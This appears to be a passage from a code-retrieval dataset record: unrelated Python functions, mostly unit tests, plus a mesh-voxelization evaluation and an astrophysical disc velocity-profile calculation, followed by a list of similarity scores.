CheckOutput(profile=profile_from_dataset)\n\n output.ensure_output_for_property(\"PRES\")\n flags = output.get_output_flags_for_property(\"PRES\")\n\n assert flags is not None\n assert isinstance(flags, ma.MaskedArray)\n assert np.all(flags == ArgoQcFlag.GOOD.value)", "def runTest(self):\n false_change = EtcProposalsChangeStub(False)\n true_change 
= EtcProposalsChangeStub()\n true_type = EtcProposalChangeType(true_change)\n false_type = EtcProposalChangeType(false_change)\n self.testbox.pack_start(false_type, False, False, 1)\n self.testbox.pack_start(true_type, False, False, 1)\n gtk.main()\n self.failIf(self.Failed, 'Test failed.')", "def test_calculates_risk_points_with_one_house(self):\n\n self.calculates_risk_points_by_houses.execute(self.user, self.risk_profile)\n\n for house in self.risk_profile[\"home\"]:\n self.assertEquals(house[\"risk_points\"], 2)", "def run_evaluation(self, example):\n assert isinstance(example, dict)\n assert 'name' in example\n\n name = example['name']\n house_id, camera_id = pbrs_utils.parse_house_and_camera_ids_from_string(name)\n\n gt_bg, gt_objects = sorted(glob.glob(path.join(config.default_out_root, 'v9_gt_mesh/{}/{}/gt*.ply'.format(house_id, camera_id))))\n gt_depths = sorted(glob.glob(path.join(config.default_out_root, 'v9_gt_mesh/{}/{}/d*.ply'.format(house_id, camera_id))))\n assert len(gt_depths) == 5\n\n gt_overhead_fg = sorted(glob.glob(path.join(config.default_out_root, 'v9_gt_overhead_mesh/{}/{}/overhead_fg.ply'.format(house_id, camera_id))))\n assert len(gt_overhead_fg) == 1\n gt_overhead_fg = gt_overhead_fg[0]\n assert path.exists(gt_overhead_fg)\n\n pred_depths = sorted(glob.glob(path.join(config.default_out_root, 'v9_pred_depth_mesh/{}/{}/pred_*.ply'.format(house_id, camera_id))))\n assert len(pred_depths) == 5\n\n pred_overhead_fg = sorted(glob.glob(path.join(config.default_out_root, 'v9_pred_depth_mesh/{}/{}/overhead_fg_clipped.ply'.format(house_id, camera_id))))\n assert len(pred_overhead_fg) == 1\n pred_overhead_fg = pred_overhead_fg[0]\n\n print('gt_depths', gt_depths)\n print('gt_objects', gt_objects)\n print('pred_depths', pred_depths)\n\n voxel_related_data_out_basedir = '/mnt/ramdisk/voxels_data/tmp_{}'.format(name.replace('/', '_'))\n for fname in glob.glob(path.join(voxel_related_data_out_basedir, '*')):\n os.remove(fname)\n\n camera_filename = example['camera_filename']\n fv = convert_mesh_to_camcoord(gt_objects, camera_filename)\n gt_objects_camcoord = path.join(voxel_related_data_out_basedir, 'gt_objects_camcoord.off')\n io_utils.save_off(fv, gt_objects_camcoord)\n\n # vox_res = 64\n vox_res = 400\n vox_method_flags = '-pb'\n\n self.run_command('/home/daeyun/usr/bin/binvox {} -d {} -bb -5 -5 -10 5 5 0 {}'.format(vox_method_flags, vox_res, gt_objects_camcoord))\n gt_object_voxel_file = gt_objects_camcoord.replace('.off', '.binvox')\n convert_binvox_to_pcl(gt_object_voxel_file)\n # convert_binvox_to_mesh(gt_object_voxel_file)\n\n ret = {}\n\n # f3d voxelization\n f3d_pred = path.join(config.default_out_root_v8, 'factored3d_pred/{}/{}/codes_transformed_clipped.ply'.format(house_id, camera_id))\n assert path.isfile(f3d_pred), f3d_pred\n fv = convert_mesh_to_camcoord(f3d_pred, camera_filename)\n f3d_objects_camcoord = path.join(voxel_related_data_out_basedir, 'f3d_objects_camcoord.off')\n io_utils.save_off(fv, f3d_objects_camcoord)\n\n self.run_command('/home/daeyun/usr/bin/binvox {} -d {} -bb -5 -5 -10 5 5 0 {}'.format(vox_method_flags, vox_res, f3d_objects_camcoord))\n f3d_objects_voxel_file = f3d_objects_camcoord.replace('.off', '.binvox')\n convert_binvox_to_pcl(f3d_objects_voxel_file)\n # convert_binvox_to_mesh(f3d_objects_voxel_file)\n\n iou = binvox_iou(f3d_objects_voxel_file, gt_object_voxel_file)\n print('IoU_f3d', iou)\n ret['IoU_f3d'] = iou\n\n '''\n # depth overhead only\n depth_meshes_fv_list = [io_utils.read_mesh_assimp(pred_d) for pred_d in 
[pred_overhead_fg]]\n # depth_meshes_fv_list = [io_utils.read_mesh_assimp(pred_d) for pred_d in pred_depths[:4]]\n\n depth_meshes_merged = io_utils.merge_meshes(*depth_meshes_fv_list)\n fv = convert_mesh_to_camcoord(depth_meshes_merged, camera_filename)\n depth_objects_camcoord = path.join(voxel_related_data_out_basedir, 'depth_meshes_ovh_camcoord.off')\n io_utils.save_off(fv, depth_objects_camcoord)\n self.run_command('/home/daeyun/usr/bin/binvox {} -d {} -bb -5 -5 -10 5 5 0 {}'.format(vox_method_flags, vox_res, depth_objects_camcoord))\n depth_ovh_voxel_file = depth_objects_camcoord.replace('.off', '.binvox')\n convert_binvox_to_pcl(depth_ovh_voxel_file)\n convert_binvox_to_mesh(depth_ovh_voxel_file)\n iou = binvox_iou(depth_ovh_voxel_file, gt_object_voxel_file)\n print('IoU_overheadonly', iou)\n ret['IoU_overheadonly'] = iou\n '''\n\n # depth voxelization no overhead\n depth_meshes_fv_list = [io_utils.read_mesh_assimp(pred_d) for pred_d in pred_depths[:4]]\n # depth_meshes_fv_list = [io_utils.read_mesh_assimp(pred_d) for pred_d in pred_depths[:4]]\n\n depth_meshes_merged = io_utils.merge_meshes(*depth_meshes_fv_list)\n fv = convert_mesh_to_camcoord(depth_meshes_merged, camera_filename)\n depth_objects_camcoord = path.join(voxel_related_data_out_basedir, 'depth_meshes_frontal4_camcoord.off')\n io_utils.save_off(fv, depth_objects_camcoord)\n self.run_command('/home/daeyun/usr/bin/binvox {} -d {} -bb -5 -5 -10 5 5 0 {}'.format(vox_method_flags, vox_res, depth_objects_camcoord))\n depth_objects_voxel_file = depth_objects_camcoord.replace('.off', '.binvox')\n convert_binvox_to_pcl(depth_objects_voxel_file)\n # convert_binvox_to_mesh(depth_objects_voxel_file)\n\n iou = binvox_iou(depth_objects_voxel_file, gt_object_voxel_file)\n print('IoU_frontaldepthonly', iou)\n ret['IoU_frontaldepthonly'] = iou\n\n # depth voxelization\n depth_meshes_fv_list = [io_utils.read_mesh_assimp(pred_d) for pred_d in pred_depths[:4] + [pred_overhead_fg]]\n # depth_meshes_fv_list = [io_utils.read_mesh_assimp(pred_d) for pred_d in pred_depths[:4]]\n\n depth_meshes_merged = io_utils.merge_meshes(*depth_meshes_fv_list)\n fv = convert_mesh_to_camcoord(depth_meshes_merged, camera_filename)\n depth_objects_camcoord = path.join(voxel_related_data_out_basedir, 'depth_meshes_frontal4_and_ovh_camcoord.off')\n io_utils.save_off(fv, depth_objects_camcoord)\n self.run_command('/home/daeyun/usr/bin/binvox {} -d {} -bb -5 -5 -10 5 5 0 {}'.format(vox_method_flags, vox_res, depth_objects_camcoord))\n depth_objects_voxel_file = depth_objects_camcoord.replace('.off', '.binvox')\n convert_binvox_to_pcl(depth_objects_voxel_file)\n # convert_binvox_to_mesh(depth_objects_voxel_file)\n\n iou = binvox_iou(depth_objects_voxel_file, gt_object_voxel_file)\n print('IoU_alldepths', iou)\n ret['IoU_alldepths'] = iou\n\n return voxel_related_data_out_basedir, ret", "def calculate_profiles(\n snap: Snap,\n radius_min: Quantity,\n radius_max: Quantity,\n scale_height_fac: float,\n n_bins: int = 50,\n) -> Dict[str, List[Profile]]:\n print('Calculating profiles...')\n\n snap.add_quantities('disc')\n snap.set_gravitational_parameter(0)\n gamma = snap.properties['adiabatic_index']\n num_dust = snap.num_dust_species\n\n # Use particles in the midplane only\n # Choose particles such that they are within a factor of the gas scale height\n gas = snap.family('gas')\n prof = plonk.load_profile(snap=gas, cmin=radius_min, cmax=radius_max)\n scale_height = prof.to_function('scale_height')\n snap_midplane = snap[np.abs(snap['z']) < scale_height_fac * 
scale_height(snap['R'])]\n\n subsnaps = snap_midplane.subsnaps_as_dict()\n\n # Create radial profiles for the gas and each dust species\n cmin, cmax = radius_min, radius_max\n profs: Dict[str, List[Profile]] = {'gas': list(), 'dust': list()}\n profs['gas'] = [\n plonk.load_profile(subsnaps['gas'], cmin=cmin, cmax=cmax, n_bins=n_bins)\n ]\n for subsnap in subsnaps['dust']:\n profs['dust'].append(\n plonk.load_profile(subsnap, cmin=cmin, cmax=cmax, n_bins=n_bins)\n )\n\n p = profs['gas'][0]\n\n # velocity_pressure is (15) in Dipierro+2018\n p['velocity_pressure'] = np.gradient(p['pressure'], p['radius']) / (\n p['density'] * p['keplerian_frequency']\n )\n\n # shear_viscosity is between (16) an (17) in Dipierro+2018\n p['shear_viscosity'] = p['disc_viscosity'] * p['density']\n\n # velocity_visc is (16) in Dipierro+2018\n p['velocity_visc'] = np.gradient(\n p['shear_viscosity']\n * p['radius'] ** 3\n * np.gradient(p['keplerian_frequency'], p['radius']),\n p['radius'],\n ) / (\n p['radius']\n * p['density']\n * np.gradient(p['radius'] ** 2 * p['keplerian_frequency'], p['radius'])\n )\n\n for idx, prof_dust in enumerate(profs['dust']):\n p[f'midplane_dust_to_gas_{idx+1:03}'] = prof_dust['density'] / p['density']\n p[f'_midplane_stokes_number_{idx+1:03}'] = (\n np.sqrt(np.pi * gamma / 8)\n * snap.properties['grain_density'][idx]\n * snap.properties['grain_size'][idx]\n * p['keplerian_frequency']\n / (p['density'] * p['sound_speed'])\n )\n\n # lambda_0 and lambda_1 are (17) in Dipierro+2018\n l0 = np.zeros(len(p)) * plonk.units['dimensionless']\n l1 = np.zeros(len(p)) * plonk.units['dimensionless']\n for idx in range(num_dust):\n St = p[f'_midplane_stokes_number_{idx+1:03}']\n eps = p[f'midplane_dust_to_gas_{idx+1:03}']\n l0 = l0 + 1 / (1 + St ** 2) * eps\n l1 = l1 + St / (1 + St ** 2) * eps\n p['lambda_0'] = l0\n p['lambda_1'] = l1\n\n v_P = p['velocity_pressure']\n v_visc = p['velocity_visc']\n l0 = p['lambda_0']\n l1 = p['lambda_1']\n\n # velocity_radial_gas is (11) in Dipierro+2018\n p['gas_velocity_radial'] = (-l1 * v_P + (1 + l0) * v_visc) / (\n (1 + l0) ** 2 + l1 ** 2\n )\n\n # velocity_azimuthal_gas is (12) in Dipierro+2018\n p['gas_velocity_azimuthal'] = (\n 1 / 2 * (v_P * (1 + l0) + v_visc * l1) / ((1 + l0) ** 2 + l1 ** 2)\n )\n\n # velocity_radial_dust_i is (13) in Dipierro+2018\n # velocity_azimuthal_dust_i is (14) in Dipierro+2018\n for idx in range(num_dust):\n St = p[f'_midplane_stokes_number_{idx+1:03}']\n eps = p[f'midplane_dust_to_gas_{idx+1:03}']\n numerator_R = v_P * ((1 + l0) * St - l1) + v_visc * (1 + l0 + St * l1)\n numerator_phi = 0.5 * v_P * (1 + l0 + St * l1) - v_visc * ((1 + l0) * St - l1)\n denominator = ((1 + l0) ** 2 + l1 ** 2) * (1 + St ** 2)\n p[f'dust_velocity_radial_{idx+1:03}'] = numerator_R / denominator\n p[f'dust_velocity_azimuthal_{idx+1:03}'] = numerator_phi / denominator\n\n # Divide by |v_P| for comparison with Figure B1 in Dipierro+2018\n # \"Analytical\" solution\n v_R = p['gas_velocity_radial']\n p['gas_velocity_radial_analytical'] = v_R / np.abs(v_P)\n for idx in range(num_dust):\n v_R = p[f'dust_velocity_radial_{idx+1:03}']\n p[f'dust_velocity_radial_analytical_{idx+1:03}'] = v_R / np.abs(v_P)\n\n # \"Numerical\" solution\n v_R = p['velocity_radial_cylindrical']\n v_R_std = p['velocity_radial_cylindrical_std']\n p['velocity_radial_numerical'] = v_R / np.abs(v_P)\n p['velocity_radial_numerical_std'] = v_R_std / np.abs(v_P)\n for prof in profs['dust']:\n v_R = prof['velocity_radial_cylindrical']\n v_R_std = prof['velocity_radial_cylindrical_std']\n 
prof['velocity_radial_numerical'] = v_R / np.abs(v_P)\n prof['velocity_radial_numerical_std'] = v_R_std / np.abs(v_P)\n\n return profs", "def test_skos_profile(self):\n soil_oi = get_adapter(str(INPUT_DIR / \"soil-profile.skos.nt\"))\n soil_oi.prefix_map()[\"soilprofile\"] = \"http://anzsoil.org/def/au/asls/soil-profile/\"\n soil_oi.ontology_metamodel_mapper = OntologyMetadataMapper(\n [], curie_converter=soil_oi.converter\n )\n soil_oi.ontology_metamodel_mapper.use_skos_profile()\n self.assertEqual(\n [\"skos:prefLabel\"], soil_oi.ontology_metamodel_mapper.map_curie(\"rdfs:label\")\n )\n self.assertEqual(\"skos:prefLabel\", soil_oi.ontology_metamodel_mapper.label_curie())\n soil_oi.multilingual = True\n self.assertTrue(soil_oi.multilingual)\n soil_oi.preferred_language = \"en\"\n label_cases = [\n (\"soilprofile:voids\", \"Voids\"),\n (\"soilprofile:soil-water-regime\", \"Soil water regime\"),\n ]\n elabels = list(soil_oi.labels(soil_oi.entities()))\n for curie, label in label_cases:\n self.assertIn((curie, label), elabels)\n self.assertEqual(label, soil_oi.label(curie))\n config = SearchConfiguration(is_partial=False, properties=[SearchProperty.LABEL])\n curies = list(soil_oi.basic_search(label, config=config))\n self.assertEqual([curie], curies)\n # TODO:\n # self.assertEqual([curie], soil_oi.curies_by_label(label))\n tdef = soil_oi.definition(\"soilprofile:voids-cracks\")\n self.assertEqual(\"Planar voids\", tdef)", "def checkProfileEquality(self, profile1, profile2):\r\n if len(profile1) != len(profile2) or len(profile1[0]) != len(profile2[0]):\r\n return False\r\n for gram1 in profile1:\r\n contains = False\r\n for gram2 in profile2:\r\n if gram1 == gram2:\r\n contains = True\r\n break\r\n if contains == False:\r\n return False\r\n return True", "def test_attributes(self):\n result = self.plugin_instance.create_probability_cube(\n self.percentiles_cube, self.orography_cube)\n self.assertEqual(result.units, \"1\")\n self.assertEqual(result.name(), self.new_name)\n self.assertEqual(result.attributes['relative_to_threshold'], 'below')\n self.assertEqual(result.attributes['thresholded_using'],\n 'surface_altitude')", "def test_single_game_works(self):\n sim = ss.Simulation(seed=154)\n game1 = sim.single_game()\n sim = ss.Simulation(seed=79)\n game2 = sim.single_game()\n assert game1 != game2, 'Your method single_game is not working.'", "def test_calculates_risk_points_with_mortgaged_house(self):\n\n self.user[\"houses\"].insert(0, {\n \"id\": 123,\n \"ownership_status\": \"mortgaged\"\n })\n\n self.risk_profile[\"home\"].insert(0, {\n \"id\": 123,\n \"is_eligible\": True,\n \"risk_points\": 1\n })\n\n self.calculates_risk_points_by_houses.execute(self.user, self.risk_profile)\n\n for house in self.risk_profile[\"home\"]:\n if house[\"id\"] == 123:\n self.assertEquals(house[\"risk_points\"], 2)\n else: \n self.assertEquals(house[\"risk_points\"], 1)\n \n self.assertEquals(self.risk_profile[\"disability\"][\"risk_points\"], 2)", "def test_generate_nb_testing(self):\n pass", "def check_expectations(self):\n self.load_results()\n\n for (benchmark, producer), result in self.results.items():\n if not result.reports:\n print('No results found for ' + benchmark + ' ' + producer)\n result.test_passed = False\n else:\n for report in result.reports:\n if check_benchmark_result(report, result.expectation):\n print('Test passed: ' + result.directory)\n result.test_passed = True\n else:\n print('Test failed: ' + result.directory)\n result.test_passed = False", "def test_init(self):\n 
self.assertTrue(self.profile.bio == \"very awesome\")" ]
[ "0.61851823", "0.58061886", "0.5779419", "0.5712594", "0.5674602", "0.5597677", "0.55736697", "0.5516804", "0.5508091", "0.5494304", "0.5471239", "0.5412909", "0.5381883", "0.5344296", "0.53197837", "0.531884", "0.53139627", "0.52807105", "0.52799165", "0.52634877", "0.5258606", "0.5234149", "0.52174133", "0.52152884", "0.52103573", "0.52060014", "0.51935214", "0.5188514", "0.51790065", "0.51676714", "0.5156733", "0.5150712", "0.5147572", "0.5140228", "0.5137297", "0.5120445", "0.5117273", "0.5112981", "0.51127565", "0.5109244", "0.51080745", "0.51057464", "0.5104817", "0.50931996", "0.50881714", "0.5083384", "0.5070954", "0.5063577", "0.5063309", "0.5056949", "0.50488764", "0.50487316", "0.50480974", "0.504616", "0.5032011", "0.50311923", "0.50292814", "0.50152403", "0.5010083", "0.5006998", "0.49961904", "0.49935016", "0.4984886", "0.49832252", "0.49742636", "0.49738497", "0.49712577", "0.49691445", "0.4967528", "0.49639365", "0.4960421", "0.4953813", "0.495062", "0.49405253", "0.4935477", "0.49252433", "0.49156383", "0.4913454", "0.49085107", "0.4900855", "0.4894699", "0.48933208", "0.48847756", "0.48840505", "0.48839217", "0.48832905", "0.48827854", "0.48825526", "0.48745677", "0.4868866", "0.48676986", "0.48648822", "0.4861814", "0.48616314", "0.48601624", "0.48518106", "0.4848623", "0.48417547", "0.4838974", "0.4838853" ]
0.5113333
37
Test the generation of a specific tophat profile against a known result.
def test_tophat():
    savedImg = galsim.fits.read(os.path.join(imgdir, "tophat_101.fits"))
    myImg = galsim.ImageF(savedImg.bounds, scale=0.2)
    myImg.setCenter(0,0)
    test_flux = 1.8
    # There are numerical issues with using radius = 1, since many points are right on the edge
    # of the circle. e.g. (+-1,0), (0,+-1), (+-0.6,+-0.8), (+-0.8,+-0.6). And in practice, some
    # of these end up getting drawn and not others, which means it's not a good choice for a unit
    # test since it wouldn't be any less correct for a different subset of these points to be
    # drawn. Using r = 1.01 solves this problem and makes the result symmetric.
    tophat = galsim.TopHat(radius=1.01, flux=1)
    tophat.drawImage(myImg, method="sb", use_true_center=False)
    np.testing.assert_array_almost_equal(
        myImg.array, savedImg.array, 5,
        err_msg="Using GSObject TopHat disagrees with expected result")
    np.testing.assert_array_equal(
        tophat.radius, 1.01,
        err_msg="TopHat radius returned wrong value")

    # Check with default_params
    tophat = galsim.TopHat(radius=1.01, flux=1, gsparams=default_params)
    tophat.drawImage(myImg, method="sb", use_true_center=False)
    np.testing.assert_array_almost_equal(
        myImg.array, savedImg.array, 5,
        err_msg="Using GSObject TopHat with default_params disagrees with expected result")
    tophat = galsim.TopHat(radius=1.01, flux=1, gsparams=galsim.GSParams())
    tophat.drawImage(myImg, method="sb", use_true_center=False)
    np.testing.assert_array_almost_equal(
        myImg.array, savedImg.array, 5,
        err_msg="Using GSObject TopHat with GSParams() disagrees with expected result")

    # Use non-unity values.
    tophat = galsim.TopHat(flux=1.7, radius=2.3)
    gsp = galsim.GSParams(xvalue_accuracy=1.e-8, kvalue_accuracy=1.e-8)
    tophat2 = galsim.TopHat(flux=1.7, radius=2.3, gsparams=gsp)
    assert tophat2 != tophat
    assert tophat2 == tophat.withGSParams(xvalue_accuracy=1.e-8, kvalue_accuracy=1.e-8)

    # Test photon shooting.
    do_shoot(tophat,myImg,"TopHat")

    # Test shoot and kvalue
    scale = 0.2939
    im = galsim.ImageF(16,16, scale=scale)
    # The choices of radius here are fairly specific. If the edge of the circle comes too close
    # to the center of one of the pixels, then the test will fail, since the Fourier draw method
    # will blur the edge a bit and give some flux to that pixel.
    for radius in [ 1.2, 0.93, 2.11 ]:
        tophat = galsim.TopHat(radius=radius, flux=test_flux)
        check_basic(tophat, "TopHat with radius = %f"%radius)
        do_shoot(tophat,im,"TopHat with radius = %f"%radius)
        do_kvalue(tophat,im,"TopHat with radius = %f"%radius)

        # This is also a profile that may be convolved using real space convolution, so test that.
        conv = galsim.Convolve(tophat, galsim.Pixel(scale=scale), real_space=True)
        check_basic(conv, "TopHat convolved with pixel in real space",
                    approx_maxsb=True, scale=0.2)
        do_kvalue(conv,im, "TopHat convolved with pixel in real space")

    cen = galsim.PositionD(0, 0)
    np.testing.assert_equal(tophat.centroid, cen)
    np.testing.assert_almost_equal(tophat.kValue(cen), (1+0j) * test_flux)
    np.testing.assert_almost_equal(tophat.flux, test_flux)
    np.testing.assert_almost_equal(tophat.xValue(cen), tophat.max_sb)
    np.testing.assert_almost_equal(tophat.xValue(radius-0.001, 0.), tophat.max_sb)
    np.testing.assert_almost_equal(tophat.xValue(0., radius-0.001), tophat.max_sb)
    np.testing.assert_almost_equal(tophat.xValue(radius+0.001, 0.), 0.)
    np.testing.assert_almost_equal(tophat.xValue(0., radius+0.001), 0.)

    # Check picklability
    do_pickle(tophat, lambda x: x.drawImage(method='no_pixel'))
    do_pickle(tophat)
    do_pickle(galsim.TopHat(1))

    # Check sheared tophat the same way
    tophat = galsim.TopHat(radius=1.2, flux=test_flux)
    # Again, the test is very sensitive to the choice of shear here. Most values fail because
    # some pixel center gets too close to the resulting ellipse for the fourier draw to match
    # the real-space draw at the required accuracy.
    tophat = tophat.shear(galsim.Shear(g1=0.15, g2=-0.33))
    check_basic(tophat, "Sheared TopHat")
    do_shoot(tophat,im, "Sheared TopHat")
    do_kvalue(tophat,im, "Sheared TopHat")
    cen = galsim.PositionD(0, 0)
    np.testing.assert_equal(tophat.centroid, cen)
    np.testing.assert_almost_equal(tophat.kValue(cen), (1+0j) * test_flux)
    np.testing.assert_almost_equal(tophat.flux, test_flux)
    np.testing.assert_almost_equal(tophat.xValue(cen), tophat.max_sb)

    # Check picklability
    do_pickle(tophat, lambda x: x.drawImage(method='no_pixel'))
    do_pickle(tophat)

    # Check real-space convolution of the sheared tophat.
    conv = galsim.Convolve(tophat, galsim.Pixel(scale=scale), real_space=True)
    check_basic(conv, "Sheared TopHat convolved with pixel in real space",
                approx_maxsb=True, scale=0.2)
    do_kvalue(conv,im, "Sheared TopHat convolved with pixel in real space")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_run_profile(dpa_model_spec, dpa_init):\n test_times = np.array(\n DateTime(['2019:001:00:00:00', '2019:001:12:00:00', '2019:002:00:00:00', '2019:003:00:00:00']).secs)\n pitch = np.array([150, 90, 156, 156])\n roll = np.array([0, -5, 10, 0])\n test_schedule = {'pitch': pitch, 'roll': roll}\n results = run_profile(test_times, test_schedule, '1dpamzt', dpa_model_spec, dpa_init)\n dpa_results = results['1dpamzt']\n assert np.all(dpa_results.mvals > -10)\n assert len(dpa_results.times) > 1", "async def test_basic_profile(players, strats):\n game = gamegen.game(players, strats)\n basesched = gamesched.gamesched(game)\n sched = canonsched.canon(basesched)\n assert np.all(sched.num_role_strats > 1)\n pay = await sched.sample_payoffs(sched.random_profile())\n assert pay.size == sched.num_strats\n assert str(sched) == str(basesched)", "def testProfileCreation(self):\n small_tree1_equality = self.checkProfileEquality(self.profiles[0], self.small_profile1)\n small_tree2_equality = self.checkProfileEquality(self.profiles[1], self.small_profile2)\n known_tree1_equality = self.checkProfileEquality(self.profiles[2], self.known_profile1)\n known_tree2_equality = self.checkProfileEquality(self.profiles[3], self.known_profile2)\n \n self.assertEqual(small_tree1_equality, True)\n self.assertEqual(small_tree2_equality, True)\n self.assertEqual(known_tree1_equality, True)\n self.assertEqual(known_tree2_equality, True)", "def __test_profile(self, bk):\n for arg in self.args['profile']:\n ds = ArgoDataFetcher(backend=bk).profile(*arg).to_xarray()\n assert isinstance(ds, xr.Dataset) == True", "def testProfileCreation(self):\r\n small_tree1_equality = self.checkProfileEquality(self.profiles[0], self.small_profile1)\r\n small_tree2_equality = self.checkProfileEquality(self.profiles[1], self.small_profile2)\r\n known_tree1_equality = self.checkProfileEquality(self.profiles[2], self.known_profile1)\r\n known_tree2_equality = self.checkProfileEquality(self.profiles[3], self.known_profile2)\r\n\r\n self.assertEqual(small_tree1_equality, True)\r\n self.assertEqual(small_tree2_equality, True)\r\n self.assertEqual(known_tree1_equality, True)\r\n self.assertEqual(known_tree2_equality, True)", "def test_execution_profiling(self):\n self._test_reports_helper({\"--profile-execution\": \"\"}, [\"report.txt\"])", "def test_creation_profile_2():\n assert tuple_NT[0][1] == LIST_dict[0]['sex'], \"sex of profile is not getting stored properly\"", "def _test_evaluate(self, format_only, outfile_predix=None):\n metric = MOTChallengeMetric(\n metric=['HOTA', 'CLEAR', 'Identity'],\n format_only=format_only,\n outfile_prefix=outfile_predix)\n metric.dataset_meta = {'classes': ('pedestrian', )}\n data_batch = dict(input=None, data_samples=None)\n predictions = self._get_predictions_demo()\n metric.process(data_batch, predictions)\n eval_results = metric.evaluate()\n return eval_results", "def test_profiles(\n self, profile_name: str, pytestconfig: object, monkeypatch: object, options: object\n ) -> None: # pylint: disable=unused-argument\n\n # initialize profile\n valid, message = self.init_profile(\n profile_name, pytestconfig=pytestconfig, monkeypatch=monkeypatch, options=options\n )\n assert valid, message\n\n # run custom test method before run method\n self.custom.test_pre_run(\n self, self.profile.data, monkeypatch if self.run_method == 'inline' else None\n )\n\n assert self.run_profile() in self.profile.exit_codes\n\n # run custom test method before validation\n self.custom.test_pre_validate(self, self.profile.data)\n\n 
# get Validation instance\n validation = ValidateFeature(self.validator)\n\n # validate App outputs and Profile outputs are consistent\n validation.validate_outputs(self.profile.tc_playbook_out_variables, self.profile.outputs)\n\n # validate App outputs with Profile outputs\n validation.validate(self.profile.outputs)\n\n # validate exit message\n exit_message_data = self.profile.exit_message\n if exit_message_data:\n self.validate_exit_message(\n exit_message_data.pop('expected_output'),\n exit_message_data.pop('op'),\n **exit_message_data\n )", "def test_creation_profile_5():\n assert tuple_NT[0][4] == LIST_dict[0]['current_location'], \"current_location' of profile is not getting stored properly\"", "def generateFinalResult(self):\n if self.__testResult == 'FAIL':\n Util.set_color(Util.FOREGROUND_RED | Util.FOREGROUND_INTENSITY)\n elif self.__testResult == 'PASS':\n Util.set_color(Util.FOREGROUND_GREEN | Util.FOREGROUND_INTENSITY)\n elif self.__testResult == 'NONE':\n Util.set_color(Util.FOREGROUND_GREEN | Util.FOREGROUND_INTENSITY) \n self.__testResult = 'PASS'\n #else:\n total_count = int(TestScriptSymbolTable.get_value_from_sym_tab(\"total_count\", TestScriptSymbolTable.test_result_tab))\n pass_count = int(TestScriptSymbolTable.get_value_from_sym_tab(\"pass_count\", TestScriptSymbolTable.test_result_tab))\n fail_count = int(TestScriptSymbolTable.get_value_from_sym_tab(\"fail_count\", TestScriptSymbolTable.test_result_tab))\n conditional_chk_flag = int(TestScriptSymbolTable.get_value_from_sym_tab(\"conditional_chk_flag\", TestScriptSymbolTable.test_result_tab))\n num_of_pass_required = int(TestScriptSymbolTable.get_value_from_sym_tab(\"num_of_pass_required\", TestScriptSymbolTable.test_result_tab))\n \n if total_count >= 1:\n if conditional_chk_flag == 1:\n if num_of_pass_required <= pass_count:\n Util.set_color(Util.FOREGROUND_GREEN | Util.FOREGROUND_INTENSITY)\n self.__testResult = 'PASS'\n else:\n Util.set_color(Util.FOREGROUND_RED | Util.FOREGROUND_INTENSITY)\n self.__testResult = 'FAIL'\n else:\n if fail_count > 0:\n Util.set_color(Util.FOREGROUND_RED | Util.FOREGROUND_INTENSITY)\n self.__testResult = 'FAIL'\n else:\n Util.set_color(Util.FOREGROUND_GREEN | Util.FOREGROUND_INTENSITY)\n self.__testResult = 'PASS'\n else:\n if GlobalConfigFiles.curr_tc_name != \"\":\n Util.set_color(Util.FOREGROUND_RED | Util.FOREGROUND_INTENSITY)\n logging.debug(\"\\n TEST COMPLETED without FINAL RESULT...\")\n\n self.__testResult = 'FAIL'\n\n self.tmsPacket.TestResult = self.__testResult\n if GlobalConfigFiles.curr_tc_name != \"\":\n logging.info(\"\\n FINAL TEST RESULT ---> %15s\", self.__testResult)\n logging.info(' END: TEST CASE [%s]', GlobalConfigFiles.curr_tc_name)\n\n Util.set_color(Util.FOREGROUND_WHITE)\n GlobalConfigFiles.test_result = self.__testResult\n\n self.tmsPacket.TimeStamp = time.strftime('%Y-%m-%dT%H:%M:%SZ', time.localtime())\n if GlobalConfigFiles.curr_tc_name != \"\":\n self.tmsPacket.writeTMSJson()\n\n return", "def test_output_ensure_output_for_property(profile_from_dataset):\n output = CheckOutput(profile=profile_from_dataset)\n\n output.ensure_output_for_property(\"PRES\")\n flags = output.get_output_flags_for_property(\"PRES\")\n\n assert flags is not None\n assert isinstance(flags, ma.MaskedArray)\n assert np.all(flags == ArgoQcFlag.GOOD.value)", "def test_get(self):\r\n profile = self.profile_manager.get('testing')\r\n self.assertIsInstance(profile, Profile)", "def TDProfiles(Prof,x,Trx,rb_spec,abs_spec,dr,inu0,bsrMult,base_T,base_P,r0):\n \n iR = Prof['WV 
Online'].size # range index for a profile into 1D x array\n x2 = np.reshape(x,(iR+1,6))\n xK = x2[0,:] # constants [HSRL Mol HSRL Comb, WV On, WV Off, O2 On ,O2 Off]\n xS = x2[1:,:] # state vector [T, nWV, BSR, phi_HSRL, phi_WV, phi_O2]\n \n # HSRLProfile(T,BSR,phi,rb_spec,Trx,inu0,K,base_T,base_P)\n HSRL_mol = HSRLProfile(xS[:,0],xS[:,2],xS[:,3],rb_spec['HSRL'],Trx['HSRL Mol'],inu0['HSRL'],xK[0],base_T,base_P)\n HSRL_comb = HSRLProfile(xS[:,0],xS[:,2],xS[:,3],rb_spec['HSRL'],Trx['HSRL Comb'],inu0['HSRL'],xK[1],base_T,base_P)\n \n# plt.figure()\n# plt.plot(np.exp(xS[:,0]))\n# plt.title('Temperature [K]')\n# \n# plt.figure()\n# plt.semilogy(np.exp(xS[:,1]))\n# plt.title('WV number density [$m^{-3}$]')\n# \n# plt.figure()\n# plt.semilogy(np.exp(xS[:,2])+1)\n# plt.title('Backscatter Ratio')\n \n \n# HSRLModel = HSRLProfileRatio(xS[:,0],P,xS[:,2], \\\n# Trx['HSRL Mol'],Trx['HSRL Comb'], \\\n# rb_spec['HSRL'],inu0['HSRL'],GainRatio=xK[0])\n\n# WVDIALProfile(T,nWV,BSR,phi,rb_spec,abs_spec,Trx,inu0,K,base_T,base_P,dr)\n WV_on = WVDIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['WV'],xS[:,4],rb_spec['WV Online'],abs_spec['WV Online'],Trx['WV Online'],inu0['WV Online'],xK[2],base_T,base_P,dr,r0)\n WV_off = WVDIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['WV'],xS[:,4],rb_spec['WV Offline'],abs_spec['WV Offline'],Trx['WV Offline'],inu0['WV Offline'],xK[3],base_T,base_P,dr,r0)\n\n# WVModel = WaterVaporProfileRatio(xS[:,0],P,xS[:,1],xS[:,2]*bsrMult['WV'],\n# Trx['WV Online'], Trx['WV Offline'], \\\n# rb_spec['WV 